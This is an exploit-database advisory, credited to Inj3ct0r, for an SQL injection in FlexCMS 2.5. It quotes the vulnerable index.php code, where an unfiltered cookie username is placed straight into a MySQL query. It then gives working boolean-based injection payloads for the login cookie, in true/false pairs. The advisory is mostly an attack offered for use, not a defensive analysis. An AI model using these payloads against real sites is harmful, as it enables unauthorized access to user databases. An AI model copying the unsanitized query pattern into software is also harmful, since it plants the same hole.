1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] Support e-mail : submit[at]inj3ct0r.com
Site product: www.flexcms.com
Version: 2.5
Requirements: magic_quotes_gpc = off
Vulnerability file (index.php) :
$CookieData = $HTTP_COOKIE_VARS[$CookieName];
$LoggedIn = 'n';
$UserLevel = 0;
if ($CookieData != '' && $CookieData != 'not_logged_in') {
list ($CookieUsername, $CookiePassword) = split('==', $CookieData, 2);
if ($CookieUsername != '' && $CookiePassword != '') {
$query = "select RecordNumber,Level,Password,DisplayName,SessionLen gth
from `".$Settings['DBPrefix']."core-Users` where Username='$CookieUsername' LIMIT
1";
$result = mysql_query($query) or die (mysql_error());
In the cookies sent login and pass, in such a
login == hash_pass
Because the variable $ CookieUsername not filtered and if magic_quotes_gpc = off is
the opportunity to inj3ct0r
Example:
True: FCLoginData12345=qwerty'+and+1=1/%3D%3DqwDyM1dbqwDyM1db9iOPI
False: FCLoginData12345=qwerty'+and+1=2/%3D%3DqwDyM1dbqwDyM1db9iOPI